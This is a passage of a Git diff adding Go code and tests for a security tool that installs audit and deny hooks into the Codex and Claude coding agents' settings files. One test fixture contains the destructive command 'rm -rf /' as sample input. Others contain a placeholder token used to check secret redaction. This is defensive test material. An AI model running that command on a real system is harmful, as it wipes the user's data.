path, configedit.RawArray(outGroups)) + if err != nil { + return false + } + s.json = patched + return added +} + +// refreshManagedEntry rewrites type, command, and timeout on an existing +// DMG hook entry while preserving every other key the user might have +// added. Used so that a `hooks install` re-run after the binary path +// changes (e.g. `brew upgrade` relocated it) updates the absolute path +// in-place rather than leaving a stale entry behind. +func refreshManagedEntry(rawEntry string, want hookEntry) (string, error) { + out := []byte(rawEntry) + var err error + out, err = sjson.SetBytes(out, "type", want.Type) + if err != nil { + return "", err + } + out, err = sjson.SetBytes(out, "command", want.Command) + if err != nil { + return "", err + } + out, err = sjson.SetBytes(out, "timeout", want.Timeout) + if err != nil { + return "", err + } + return string(out), nil +} + +// removeManagedHooks strips every DMG-owned entry (regex match on +// managedCmdRE). Returns the hook events from which at least one entry +// was removed. binaryPath is reserved for future scoping (e.g., +// "remove only entries pointing at this specific binary"); today we +// remove any entry whose command matches managedCmdRE, regardless of +// the path token. +func (s *settingsDoc) removeManagedHooks(binaryPath string) []event.HookEvent { + _ = binaryPath + var removed []event.HookEvent + hooksRoot := gjson.GetBytes(s.json, "hooks") + if !hooksRoot.IsObject() { + return nil + } + + type hookKeyEntry struct { + key string + list []gjson.Result + } + var events []hookKeyEntry + hooksRoot.ForEach(func(k, v gjson.Result) bool { + if v.IsArray() { + events = append(events, hookKeyEntry{key: k.String(), list: v.Array()}) + } + return true + }) + + for _, ev := range events { + outGroups := make([]string, 0, len(ev.list)) + didRemove := false + for _, group := range ev.list { + if !group.IsObject() { + outGroups = append(outGroups, group.Raw) + continue + } + inner := group.Get("hooks").Array() + filteredInner := make([]string, 0, len(inner)) + groupChanged := false + for _, h := range inner { + if h.IsObject() && isManagedCommand(h.Get("command").String()) { + didRemove = true + groupChanged = true + continue + } + filteredInner = append(filteredInner, h.Raw) + } + if len(filteredInner) == 0 { + continue + } + if !groupChanged { + outGroups = append(outGroups, group.Raw) + continue + } + updated, err := sjson.SetRawBytes([]byte(group.Raw), "hooks", []byte(configedit.RawArray(filteredInner))) + if err != nil { + return nil + } + outGroups = append(outGroups, string(updated)) + } + if didRemove { + removed = append(removed, event.HookEvent(ev.key)) + } + if !didRemove { + continue + } + path := configedit.Path("hooks", ev.key) + if len(outGroups) == 0 { + next, err := configedit.Delete(s.json, path) + if err != nil { + return nil + } + s.json = next + continue + } + next, err := configedit.SetRaw(s.json, path, configedit.RawArray(outGroups)) + if err != nil { + return nil + } + s.json = next + } + + if hooks := gjson.GetBytes(s.json, "hooks"); hooks.IsObject() { + empty := true + hooks.ForEach(func(k, v gjson.Result) bool { + empty = false + return false + }) + if empty { + next, err := configedit.Delete(s.json, "hooks") + if err == nil { + s.json = next + } + } + } + + slices.SortFunc(removed, func(a, b event.HookEvent) int { + switch { + case a < b: + return -1 + case a > b: + return 1 + } + return 0 + }) + return removed +} + +// writeAtomic installs doc.json through atomicfile. When the upsert +// pipeline produced no structural change, doc.json is byte-identical +// to doc.orig and the call is a complete no-op (no backup, no write, +// returns nil result). Otherwise the entire file is pretty-printed +// with 2-space indent so the result is human-readable. +// +// Returns nil, nil on no-op. Returns &WriteResult, nil on a successful +// write. The caller copies fields into adapter.InstallResult / +// adapter.UninstallResult so the install handler can chown them under +// root. +func writeAtomic(path string, doc *settingsDoc) (*atomicfile.WriteResult, error) { + if !json.Valid(doc.json) { + return nil, fmt.Errorf("claude settings: invalid JSON after edit") + } + if bytes.Equal(doc.json, doc.orig) { + return nil, nil + } + out := pretty.PrettyOptions(doc.json, &pretty.Options{Indent: " ", Width: 80}) + if bytes.Equal(out, doc.orig) { + return nil, nil + } + mode := atomicfile.PickMode(path, settingsMode) + wr, err := atomicfile.WriteAtomic(path, out, mode) + if err != nil { + return nil, err + } + return &wr, nil +} diff --git a/internal/aiagents/adapter/codex/adapter.go b/internal/aiagents/adapter/codex/adapter.go new file mode 100644 index 0000000..ec3b7ce --- /dev/null +++ b/internal/aiagents/adapter/codex/adapter.go @@ -0,0 +1,250 @@ +// Package codex implements the Adapter interface for OpenAI Codex. +// +// Detection is by `executor.LookPath("codex")`. Codex stores hook +// configuration across two files: +// +// - ~/.codex/hooks.json — hook definitions (JSON) +// - ~/.codex/config.toml — global config; install also sets +// `[features].codex_hooks = true` here so Codex actually invokes +// hooks at runtime +// +// Uninstall removes DMG-owned hook entries from hooks.json but does +// NOT revert the codex_hooks feature flag — the user may have wired +// up other tools' hooks that depend on it. +// +// Restore + Status are intentionally absent (see adapter.Adapter for +// the trimmed-interface rationale). There is no Force install option: +// the upsert path always refreshes managed entries in place, which +// covers the binary-move self-heal case the same way claudecode does. +package codex + +import ( + "context" + "fmt" + "path/filepath" + "slices" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/configedit" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// AgentName is the identifier DMG uses for Codex on the wire and in +// the `_hook ` invocation. Adapter-private; the runtime never +// compares against it. +const AgentName = "codex" + +// AgentBinary is the name `executor.LookPath` searches for during +// detection. Adapter-private. +const AgentBinary = "codex" + +// Adapter implements adapter.Adapter for OpenAI Codex. +// +// State is set once at construction and never mutated. hooksPath and +// configPath are derived from home; binaryPath is the absolute DMG +// binary path the install handler resolved via +// internal/aiagents/cli.Resolve. +type Adapter struct { + hooksPath string + configPath string + binaryPath string +} + +// New constructs an Adapter for the given user home and resolved DMG +// binary path. Both arguments must be absolute; behavior with relative +// paths is undefined. +func New(home, binaryPath string) *Adapter { + return &Adapter{ + hooksPath: filepath.Join(home, ".codex", "hooks.json"), + configPath: filepath.Join(home, ".codex", "config.toml"), + binaryPath: binaryPath, + } +} + +// Name returns the adapter agent name. +func (a *Adapter) Name() string { return AgentName } + +// ManagedFiles enumerates the two files Codex install/uninstall +// mutates. Used by the install handler for the chown sweep under root. +func (a *Adapter) ManagedFiles() []adapter.ManagedFile { + return []adapter.ManagedFile{ + {Label: "~/.codex/hooks.json", Path: a.hooksPath}, + {Label: "~/.codex/config.toml", Path: a.configPath}, + } +} + +// Detect reports whether the Codex CLI is on $PATH. Settings file +// presence is NOT a gate — install creates the files from scratch +// when absent. +func (a *Adapter) Detect(ctx context.Context, exec executor.Executor) (adapter.DetectionResult, error) { + res := adapter.DetectionResult{} + bin, err := exec.LookPath(AgentBinary) + if err != nil { + res.Notes = append(res.Notes, "codex CLI not found on $PATH") + return res, nil + } + res.Detected = true + res.BinaryPath = bin + return res, nil +} + +// Install adds DMG-owned hooks to hooks.json and ensures the +// `[features].codex_hooks=true` flag in config.toml. +// +// Multi-file safety: every output buffer (hooks.json + config.toml) +// is loaded, validated, and encoded BEFORE the first write happens — +// a malformed config.toml aborts the operation with hooks.json still +// intact. Partial-write states are forbidden (covered by +// TestInstallMalformedTOMLDoesNotMutateHooks). +// +// Idempotent: when both files are already in desired state, returns +// empty WrittenFiles and BackupFiles and performs no writes. +func (a *Adapter) Install(ctx context.Context) (adapter.InstallResult, error) { + res := adapter.InstallResult{} + + // Load+validate-encode both files BEFORE writing either. + doc, err := loadHooksDoc(a.hooksPath) + if err != nil { + return res, err + } + cfgBytes, err := loadConfigTOMLBytes(a.configPath) + if err != nil { + return res, err + } + + for _, ht := range supportedHookEvents { + if doc.upsertHook(ht, a.commandFor(ht)) { + res.HooksAdded = append(res.HooksAdded, ht) + } else { + res.HooksKept = append(res.HooksKept, ht) + } + } + patchedCfg, flagChanged, err := configedit.EnsureCodexHooksFlag(cfgBytes) + if err != nil { + return res, err + } + + hooksWR, err := writeHooksAtomic(a.hooksPath, doc) + if err != nil { + return res, err + } + if hooksWR != nil { + res.WrittenFiles = append(res.WrittenFiles, hooksWR.Path) + if hooksWR.BackupPath != "" { + res.BackupFiles = append(res.BackupFiles, hooksWR.BackupPath) + } + res.CreatedDirs = append(res.CreatedDirs, hooksWR.CreatedDirs...) + } + + if flagChanged { + cfgWR, err := writeConfigAtomic(a.configPath, patchedCfg) + if err != nil { + return res, err + } + if cfgWR != nil { + res.WrittenFiles = append(res.WrittenFiles, cfgWR.Path) + if cfgWR.BackupPath != "" { + res.BackupFiles = append(res.BackupFiles, cfgWR.BackupPath) + } + res.CreatedDirs = appendUnique(res.CreatedDirs, cfgWR.CreatedDirs...) + } + res.Notes = append(res.Notes, "enabled [features].codex_hooks=true in "+a.configPath) + } + return res, nil +} + +// Uninstall removes DMG-owned hook entries from hooks.json. The +// `[features].codex_hooks` flag in config.toml is intentionally NOT +// reverted — the user may have other tools' hooks that depend on it +// being enabled. +// +// The settings file is preserved even when uninstall removes the last +// hook — leaving an empty {} (or whatever non-hook keys remain) keeps +// any user customization intact. +func (a *Adapter) Uninstall(ctx context.Context) (adapter.UninstallResult, error) { + res := adapter.UninstallResult{} + + doc, err := loadHooksDoc(a.hooksPath) + if err != nil { + return res, err + } + res.HooksRemoved = doc.removeManagedHooks(a.binaryPath) + if len(res.HooksRemoved) == 0 { + res.Notes = append(res.Notes, "no DMG-owned Codex hook entries found") + res.Notes = append(res.Notes, "Codex hooks feature flag left enabled because non-DMG hooks may exist") + return res, nil + } + wr, err := writeHooksAtomic(a.hooksPath, doc) + if err != nil { + return res, fmt.Errorf("codex uninstall: %w", err) + } + if wr != nil { + res.WrittenFiles = append(res.WrittenFiles, wr.Path) + if wr.BackupPath != "" { + res.BackupFiles = append(res.BackupFiles, wr.BackupPath) + } + } + res.Notes = append(res.Notes, "Codex hooks feature flag left enabled because non-DMG hooks may exist") + return res, nil +} + +// commandFor renders the literal command string DMG writes into the +// settings entry for hookEvent. Format: +// +// _hook codex +// +// The binary path is absolute and symlink-resolved at install time; +// see internal/aiagents/cli/selfpath.go. +func (a *Adapter) commandFor(hookEvent event.HookEvent) string { + return a.binaryPath + " _hook " + AgentName + " " + string(hookEvent) +} + +// noopResponse marshals to {} — Codex treats empty output / {} as +// "continue, no decision". It is the default for every hook event. +type noopResponse struct{} + +// preToolUseDeny is the spec-compliant Codex deny shape. Used only on +// PreToolUse block decisions. +type preToolUseDeny struct { + HookSpecificOutput map[string]any `json:"hookSpecificOutput"` +} + +// DecideResponse renders a generic Decision into Codex's wire format. +// Default is the empty object {}; only PreToolUse + Allow=false +// produces the hook-specific deny shape. +// +// The runtime NEVER returns Allow=false to the agent today: the +// policy evaluator is forced to audit mode. The Allow=false path is +// exercised only by adapter unit tests until block mode ships. +func (a *Adapter) DecideResponse(ev *event.Event, d adapter.Decision) adapter.HookResponse { + if d.Allow || ev == nil { + return noopResponse{} + } + if ev.HookPhase == event.HookPhasePreTool { + msg := d.UserMessage + if msg == "" { + msg = "Blocked by your organization's administrator." + } + return preToolUseDeny{ + HookSpecificOutput: map[string]any{ + "hookEventName": string(HookPreToolUse), + "permissionDecision": "deny", + "permissionDecisionReason": msg, + }, + } + } + return noopResponse{} +} + +// appendUnique appends each item to base if not already present, +// preserving base's order. Used to merge CreatedDirs from two +// atomicfile writes that share a parent (~/.codex/). +func appendUnique(base []string, items ...string) []string { + for _, it := range items { + if !slices.Contains(base, it) { + base = append(base, it) + } + } + return base +} diff --git a/internal/aiagents/adapter/codex/adapter_test.go b/internal/aiagents/adapter/codex/adapter_test.go new file mode 100644 index 0000000..7972fd2 --- /dev/null +++ b/internal/aiagents/adapter/codex/adapter_test.go @@ -0,0 +1,900 @@ +package codex + +import ( + "bytes" + "context" + "encoding/json" + "os" + "path/filepath" + "slices" + "strings" + "testing" + + toml "github.com/pelletier/go-toml/v2" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// testBinary is the absolute DMG binary path tests pass to New(). The +// uninstall matcher (managedCmdRE) is path-token-agnostic, so the +// specific value just needs to satisfy +// `(^|/)stepsecurity-dev-machine-guard\s+_hook\s+`. +const testBinary = "/usr/local/bin/stepsecurity-dev-machine-guard" + +// commandFor renders the canonical command string the adapter writes +// into hook entries for testBinary. Tests use this to assert exact +// command values without duplicating the format. +func commandFor(hookEvent event.HookEvent) string { + return testBinary + " _hook codex " + string(hookEvent) +} + +// newCodexHome returns (adapter, home, hooksPath, configPath). Files +// are NOT pre-created — callers that need pre-existing files use +// writeFile. +func newCodexHome(t *testing.T) (*Adapter, string, string, string) { + t.Helper() + home := t.TempDir() + a := New(home, testBinary) + codexDir := filepath.Join(home, ".codex") + return a, home, filepath.Join(codexDir, "hooks.json"), filepath.Join(codexDir, "config.toml") +} + +// withCodexFiles pre-creates ~/.codex/{hooks.json,config.toml} with +// the given bodies. Empty bodies skip that file. +func withCodexFiles(t *testing.T, hooksBody, cfgBody string) (*Adapter, string, string, string) { + t.Helper() + a, home, hooks, cfg := newCodexHome(t) + if hooksBody != "" || cfgBody != "" { + if err := os.MkdirAll(filepath.Dir(hooks), 0o700); err != nil { + t.Fatal(err) + } + } + if hooksBody != "" { + writeFile(t, hooks, hooksBody) + } + if cfgBody != "" { + writeFile(t, cfg, cfgBody) + } + return a, home, hooks, cfg +} + +func writeFile(t *testing.T, path, body string) { + t.Helper() + if err := os.WriteFile(path, []byte(body), 0o600); err != nil { + t.Fatal(err) + } +} + +func readJSON(t *testing.T, path string) map[string]any { + t.Helper() + b, err := os.ReadFile(path) + if err != nil { + t.Fatal(err) + } + var m map[string]any + if err := json.Unmarshal(b, &m); err != nil { + t.Fatalf("hooks.json not valid JSON: %v: %s", err, b) + } + return m +} + +func readTOML(t *testing.T, path string) map[string]any { + t.Helper() + b, err := os.ReadFile(path) + if err != nil { + t.Fatal(err) + } + m := map[string]any{} + if err := toml.Unmarshal(b, &m); err != nil { + t.Fatalf("config.toml not valid TOML: %v: %s", err, b) + } + return m +} + +func TestNameAndManagedFiles(t *testing.T) { + a, home, hooks, cfg := newCodexHome(t) + if a.Name() != "codex" { + t.Errorf("Name=%q", a.Name()) + } + mfs := a.ManagedFiles() + if len(mfs) != 2 { + t.Fatalf("ManagedFiles len=%d", len(mfs)) + } + if mfs[0].Path != hooks || mfs[1].Path != cfg { + t.Errorf("ManagedFiles paths: %+v (home=%s)", mfs, home) + } +} + +func TestDetectReportsPathFromExecutor(t *testing.T) { + a := New(t.TempDir(), testBinary) + + mock := executor.NewMock() + res, err := a.Detect(context.Background(), mock) + if err != nil { + t.Fatalf("Detect: %v", err) + } + if res.Detected { + t.Errorf("expected Detected=false when codex not on $PATH") + } + + mock.SetPath("codex", "/usr/local/bin/codex") + res, err = a.Detect(context.Background(), mock) + if err != nil { + t.Fatalf("Detect: %v", err) + } + if !res.Detected { + t.Errorf("expected Detected=true when codex on $PATH") + } + if res.BinaryPath != "/usr/local/bin/codex" { + t.Errorf("BinaryPath = %q, want /usr/local/bin/codex", res.BinaryPath) + } +} + +// ---------- DecideResponse ---------- + +func TestDecideResponseAllowEmptyObject(t *testing.T) { + a := New(t.TempDir(), testBinary) + for _, ht := range supportedHookEvents { + ev := &event.Event{HookEvent: ht, HookPhase: phaseFor(ht)} + resp := a.DecideResponse(ev, adapter.AllowDecision()) + encoded, _ := json.Marshal(resp) + if string(encoded) != `{}` { + t.Errorf("hook %s: allow shape: %s", ht, encoded) + } + } +} + +func TestDecideResponsePreToolUseDenyShape(t *testing.T) { + a := New(t.TempDir(), testBinary) + ev := &event.Event{HookEvent: HookPreToolUse, HookPhase: event.HookPhasePreTool} + resp := a.DecideResponse(ev, adapter.Decision{Allow: false, UserMessage: "Blocked by your organization's administrator."}) + encoded, _ := json.Marshal(resp) + var got map[string]any + if err := json.Unmarshal(encoded, &got); err != nil { + t.Fatal(err) + } + hso, ok := got["hookSpecificOutput"].(map[string]any) + if !ok { + t.Fatalf("missing hookSpecificOutput: %s", encoded) + } + if hso["hookEventName"] != "PreToolUse" { + t.Errorf("hookEventName: %v", hso["hookEventName"]) + } + if hso["permissionDecision"] != "deny" { + t.Errorf("permissionDecision: %v", hso["permissionDecision"]) + } + if hso["permissionDecisionReason"] != "Blocked by your organization's administrator." { + t.Errorf("reason: %v", hso["permissionDecisionReason"]) + } + for _, banned := range []string{"continue", "stopReason", "suppressOutput", "updatedInput", "updatedPermissions", "interrupt", "decision", "additionalContext"} { + if _, ok := got[banned]; ok { + t.Errorf("must not emit %q: %s", banned, encoded) + } + } +} + +func TestDecideResponseDefaultBlockMessage(t *testing.T) { + // The user-visible deny string is "Blocked by your organization's + // administrator." When the runtime passes a Decision with empty + // UserMessage, the adapter must substitute this literal verbatim. + a := New(t.TempDir(), testBinary) + ev := &event.Event{HookEvent: HookPreToolUse, HookPhase: event.HookPhasePreTool} + resp := a.DecideResponse(ev, adapter.Decision{Allow: false}) + encoded, _ := json.Marshal(resp) + if !strings.Contains(string(encoded), "Blocked by your organization's administrator.") { + t.Errorf("default deny message missing/changed: %s", encoded) + } +} + +func TestDecideResponseNonPreToolUseBlockReturnsEmpty(t *testing.T) { + a := New(t.TempDir(), testBinary) + for _, ht := range []event.HookEvent{HookPostToolUse, HookSessionStart, HookPermissionRequest, HookUserPromptSubmit, HookStop} { + ev := &event.Event{HookEvent: ht, HookPhase: phaseFor(ht)} + resp := a.DecideResponse(ev, adapter.Decision{Allow: false, UserMessage: "x"}) + encoded, _ := json.Marshal(resp) + if string(encoded) != `{}` { + t.Errorf("hook %s: stray block must produce {}, got %s", ht, encoded) + } + } +} + +func TestDecideResponseNilEventEmpty(t *testing.T) { + a := New(t.TempDir(), testBinary) + resp := a.DecideResponse(nil, adapter.Decision{Allow: false, UserMessage: "ignored"}) + encoded, _ := json.Marshal(resp) + if string(encoded) != `{}` { + t.Errorf("nil event: %s", encoded) + } +} + +// ---------- ParseEvent ---------- + +func parse(t *testing.T, hook event.HookEvent, body string) *event.Event { + t.Helper() + a := New(t.TempDir(), testBinary) + ev, err := a.ParseEvent(context.Background(), hook, []byte(body)) + if err != nil { + t.Fatalf("ParseEvent: %v", err) + } + return ev +} + +func TestParseSessionStartKeepsSource(t *testing.T) { + ev := parse(t, HookSessionStart, `{"session_id":"s","source":"startup","cwd":"/tmp"}`) + if ev.HookPhase != event.HookPhaseSessionStart { + t.Errorf("phase: %s", ev.HookPhase) + } + if ev.ActionType != "" { + t.Errorf("action_type must be empty, got %q", ev.ActionType) + } + if ev.Payload["source"] != "startup" { + t.Errorf("source not preserved: %v", ev.Payload) + } +} + +func TestParseRecordsHookEventNameMismatch(t *testing.T) { + ev := parse(t, HookSessionStart, `{"hook_event_name":"PreToolUse"}`) + if ev.HookEvent != HookSessionStart { + t.Errorf("HookEvent should follow CLI arg, got %q", ev.HookEvent) + } + if len(ev.Errors) != 1 || ev.Errors[0].Code != "hook_event_name_mismatch" { + t.Errorf("expected mismatch error, got %+v", ev.Errors) + } +} + +func TestParsePreToolUseBashClassifies(t *testing.T) { + ev := parse(t, HookPreToolUse, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"echo hi","cwd":"/tmp"} + }`) + if ev.HookPhase != event.HookPhasePreTool { + t.Errorf("phase: %s", ev.HookPhase) + } + if ev.ActionType != event.ActionCommandExec { + t.Errorf("action: %s", ev.ActionType) + } + a := New(t.TempDir(), testBinary) + cmd, cwd, ok := a.ShellCommand(ev) + if !ok || cmd == "" || cwd == "" { + t.Errorf("shell extraction failed: cmd=%q cwd=%q ok=%v", cmd, cwd, ok) + } +} + +func TestParsePreToolUseBashRedactsSecrets(t *testing.T) { + ev := parse(t, HookPreToolUse, `{"tool_name":"Bash","tool_input":{"command":"GITHUB_TOKEN=ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa make deploy"}}`) + encoded, _ := json.Marshal(ev) + if strings.Contains(string(encoded), "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") { + t.Errorf("secret leaked: %s", encoded) + } +} + +func TestParsePreToolUseApplyPatchIsFileWriteNotShell(t *testing.T) { + ev := parse(t, HookPreToolUse, `{"tool_name":"apply_patch","tool_input":{"command":"*** Begin Patch ***"}}`) + if ev.ActionType != event.ActionFileWrite { + t.Errorf("action: %s", ev.ActionType) + } + a := New(t.TempDir(), testBinary) + if _, _, ok := a.ShellCommand(ev); ok { + t.Errorf("apply_patch must not be treated as shell") + } +} + +func TestParsePreToolUseMCPClassifies(t *testing.T) { + ev := parse(t, HookPreToolUse, `{"tool_name":"mcp__filesystem__read_file","tool_input":{"path":"/tmp"}}`) + if ev.ActionType != event.ActionMCPInvocation { + t.Errorf("action: %s", ev.ActionType) + } +} + +func TestParsePermissionRequestNoActionType(t *testing.T) { + ev := parse(t, HookPermissionRequest, `{"tool_name":"Bash","tool_input":{"command":"rm -rf /","description":"delete world"}}`) + if ev.HookPhase != event.HookPhasePermissionRequest { + t.Errorf("phase: %s", ev.HookPhase) + } + if ev.ActionType != "" { + t.Errorf("action_type must be empty, got %q", ev.ActionType) + } + ti := ev.Payload["tool_input"].(map[string]any) + if ti["description"] != "delete world" { + t.Errorf("description not preserved: %v", ti) + } +} + +func TestParsePostToolUseSuccess(t *testing.T) { + ev := parse(t, HookPostToolUse, `{"tool_name":"Bash","tool_input":{"command":"echo hi"},"tool_response":"hi"}`) + if ev.ResultStatus != event.ResultSuccess { + t.Errorf("result_status: %s", ev.ResultStatus) + } + if ev.Payload["tool_response"] != "hi" { + t.Errorf("tool_response not preserved: %v", ev.Payload) + } +} + +func TestParseUserPromptKeepsRedactedPrompt(t *testing.T) { + ev := parse(t, HookUserPromptSubmit, `{"prompt":"deploy with GITHUB_TOKEN=ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}`) + encoded, _ := json.Marshal(ev) + got := string(encoded) + if strings.Contains(got, "prompt_present") { + t.Errorf("prompt must be preserved, not stub: %s", got) + } + if strings.Contains(got, "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") { + t.Errorf("secret in prompt leaked: %s", got) + } + if !strings.Contains(ev.Payload["prompt"].(string), "deploy") { + t.Errorf("prompt text lost: %v", ev.Payload["prompt"]) + } +} + +func TestParseStopScrubsLastAssistantMessage(t *testing.T) { + ev := parse(t, HookStop, `{"last_assistant_message":"hello world"}`) + encoded, _ := json.Marshal(ev) + got := string(encoded) + if strings.Contains(got, "hello world") { + t.Errorf("last_assistant_message leaked: %s", got) + } + if !strings.Contains(got, `"last_assistant_message_present":true`) { + t.Errorf("expected presence marker: %s", got) + } +} + +func TestParseInvalidJSONReturnsError(t *testing.T) { + a := New(t.TempDir(), testBinary) + _, err := a.ParseEvent(context.Background(), HookPreToolUse, []byte(`{not json`)) + if err == nil { + t.Error("expected error on invalid JSON") + } +} + +func TestParseAgentNameIsCodex(t *testing.T) { + ev := parse(t, HookSessionStart, `{}`) + if ev.AgentName != "codex" { + t.Errorf("AgentName: %s", ev.AgentName) + } +} + +func TestParsePopulatesCommonFields(t *testing.T) { + ev := parse(t, HookPreToolUse, `{ + "session_id":"sess", + "cwd":"/tmp", + "permission_mode":"default", + "tool_name":"Bash", + "tool_use_id":"tu_1", + "tool_input":{"command":"echo"} + }`) + if ev.SessionID != "sess" || ev.WorkingDirectory != "/tmp" || ev.PermissionMode != "default" || ev.ToolName != "Bash" || ev.ToolUseID != "tu_1" { + t.Errorf("fields: %+v", ev) + } +} + +func TestPhaseForUnknown(t *testing.T) { + if phaseFor("Bogus") != event.HookPhaseUnknown { + t.Errorf("phaseFor unknown: %s", phaseFor("Bogus")) + } +} + +// ---------- Install ---------- + +func TestInstallCreatesHooksAndFeatureFlag(t *testing.T) { + a, _, hooks, cfg := newCodexHome(t) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatalf("Install: %v", err) + } + if len(res.HooksAdded) != len(supportedHookEvents) { + t.Errorf("expected all hooks added, got %v", res.HooksAdded) + } + got := readJSON(t, hooks) + hooksMap, ok := got["hooks"].(map[string]any) + if !ok { + t.Fatalf("hooks key missing: %v", got) + } + for _, ht := range supportedHookEvents { + if _, ok := hooksMap[string(ht)]; !ok { + t.Errorf("hook %s missing from output: %v", ht, hooksMap) + } + } + pre := hooksMap["PreToolUse"].([]any)[0].(map[string]any) + if pre["matcher"] != "*" { + t.Errorf("PreToolUse matcher: %v", pre["matcher"]) + } + innerPre := pre["hooks"].([]any)[0].(map[string]any) + if innerPre["command"] != commandFor(HookPreToolUse) { + t.Errorf("PreToolUse command: %v (want %s)", innerPre["command"], commandFor(HookPreToolUse)) + } + if innerPre["timeout"].(float64) != 30 { + t.Errorf("PreToolUse timeout: %v", innerPre["timeout"]) + } + // SessionStart matcher is the literal startup|resume|clear. + ss := hooksMap["SessionStart"].([]any)[0].(map[string]any) + if ss["matcher"] != "startup|resume|clear" { + t.Errorf("SessionStart matcher: %v", ss["matcher"]) + } + // UserPromptSubmit and Stop omit matcher. + ups := hooksMap["UserPromptSubmit"].([]any)[0].(map[string]any) + if _, has := ups["matcher"]; has { + t.Errorf("UserPromptSubmit must omit matcher: %v", ups) + } + stop := hooksMap["Stop"].([]any)[0].(map[string]any) + if _, has := stop["matcher"]; has { + t.Errorf("Stop must omit matcher: %v", stop) + } + + // Feature flag. + cfgMap := readTOML(t, cfg) + features, ok := cfgMap["features"].(map[string]any) + if !ok { + t.Fatalf("features table missing: %v", cfgMap) + } + if features["codex_hooks"] != true { + t.Errorf("codex_hooks not true: %v", features) + } + + // InstallResult tracks both files written under root chown. + if !slices.Contains(res.WrittenFiles, hooks) { + t.Errorf("WrittenFiles missing hooks.json: %v", res.WrittenFiles) + } + if !slices.Contains(res.WrittenFiles, cfg) { + t.Errorf("WrittenFiles missing config.toml: %v", res.WrittenFiles) + } +} + +func TestInstallPreservesUnrelatedHooksAndConfig(t *testing.T) { + a, _, hooks, cfg := withCodexFiles(t, + `{ + "hooks": { + "PreToolUse": [ + {"matcher": "Bash", "hooks": [{"type": "command", "command": "echo user"}]} + ], + "PluginEvent": [ + {"matcher": "*", "hooks": [{"type": "command", "command": "echo plugin"}]} + ] + } + }`, + `model = "gpt-5" +[features] +other_flag = true +`) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + got := readJSON(t, hooks) + hooksMap := got["hooks"].(map[string]any) + pre := hooksMap["PreToolUse"].([]any) + commands := []string{} + for _, raw := range pre { + group := raw.(map[string]any) + for _, h := range group["hooks"].([]any) { + hm := h.(map[string]any) + commands = append(commands, hm["command"].(string)) + } + } + joined := strings.Join(commands, "\n") + if !strings.Contains(joined, "echo user") { + t.Errorf("user PreToolUse hook lost; got %q", joined) + } + if !strings.Contains(joined, commandFor(HookPreToolUse)) { + t.Errorf("DMG PreToolUse hook missing; got %q", joined) + } + if _, ok := hooksMap["PluginEvent"]; !ok { + t.Error("unrelated PluginEvent removed") + } + + cfgMap := readTOML(t, cfg) + if cfgMap["model"] != "gpt-5" { + t.Errorf("unrelated config key lost: %v", cfgMap) + } + features := cfgMap["features"].(map[string]any) + if features["other_flag"] != true { + t.Errorf("unrelated features key lost: %v", features) + } + if features["codex_hooks"] != true { + t.Errorf("codex_hooks not enabled: %v", features) + } +} + +func TestInstallIdempotent(t *testing.T) { + a, _, hooks, _ := newCodexHome(t) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + first := readJSON(t, hooks) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + second := readJSON(t, hooks) + firstBytes, _ := json.Marshal(first) + secondBytes, _ := json.Marshal(second) + if string(firstBytes) != string(secondBytes) { + t.Errorf("install not idempotent:\n first %s\n second %s", firstBytes, secondBytes) + } +} + +func TestInstallOnMalformedTOMLFails(t *testing.T) { + a, _, _, _ := withCodexFiles(t, "", `[features +broken`) + if _, err := a.Install(context.Background()); err == nil { + t.Fatal("expected install error on malformed TOML") + } +} + +// TestInstallMalformedTOMLDoesNotMutateHooks asserts the multi-file +// safety invariant: a malformed config.toml must abort install BEFORE +// hooks.json is touched. Otherwise an install can leave hooks.json +// mutated while config.toml stays broken — a forbidden partial-write +// state. +func TestInstallMalformedTOMLDoesNotMutateHooks(t *testing.T) { + a, _, hooks, _ := withCodexFiles(t, + `{"hooks":{"PreToolUse":[{"matcher":"Bash","hooks":[{"type":"command","command":"echo user"}]}]}}`, + `[features +broken`) + original, err := os.ReadFile(hooks) + if err != nil { + t.Fatal(err) + } + if _, err := a.Install(context.Background()); err == nil { + t.Fatal("expected install error on malformed TOML") + } + got, _ := os.ReadFile(hooks) + if string(got) != string(original) { + t.Errorf("hooks.json must not be mutated when config.toml fails:\n pre %s\n post %s", original, got) + } + matches, _ := filepath.Glob(hooks + ".dmg-*.bak") + if len(matches) > 0 { + t.Errorf("hooks.json backup should not exist on aborted install: %v", matches) + } +} + +// TestInstallMovesManagedEntryFromStaleMatcher: a pre-existing managed +// entry under the wrong matcher (e.g. PreToolUse pinned to `Bash`) +// silently narrows audit coverage. Install must move it to the desired +// matcher. +func TestInstallMovesManagedEntryFromStaleMatcher(t *testing.T) { + staleBody := `{ + "hooks": { + "PreToolUse": [ + {"matcher":"Bash","hooks":[ + {"type":"command","command":"` + commandFor(HookPreToolUse) + `","timeout":30,"statusMessage":"old"} + ]} + ] + } + }` + a, _, hooks, _ := withCodexFiles(t, staleBody, "") + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + got := readJSON(t, hooks) + pre := got["hooks"].(map[string]any)["PreToolUse"].([]any) + for _, raw := range pre { + group := raw.(map[string]any) + matcher, _ := group["matcher"].(string) + for _, h := range group["hooks"].([]any) { + hm := h.(map[string]any) + cmd, _ := hm["command"].(string) + if isManagedCommand(cmd) && matcher != "*" { + t.Errorf("managed entry remained under stale matcher %q: %+v", matcher, group) + } + } + } +} + +// TestInstallRefreshesStaleBinaryPath asserts the binary-move +// self-heal: when hooks.json contains a managed entry pointing at an +// old absolute path, a fresh install rewrites the command in-place. +// Without this, `brew upgrade` (which 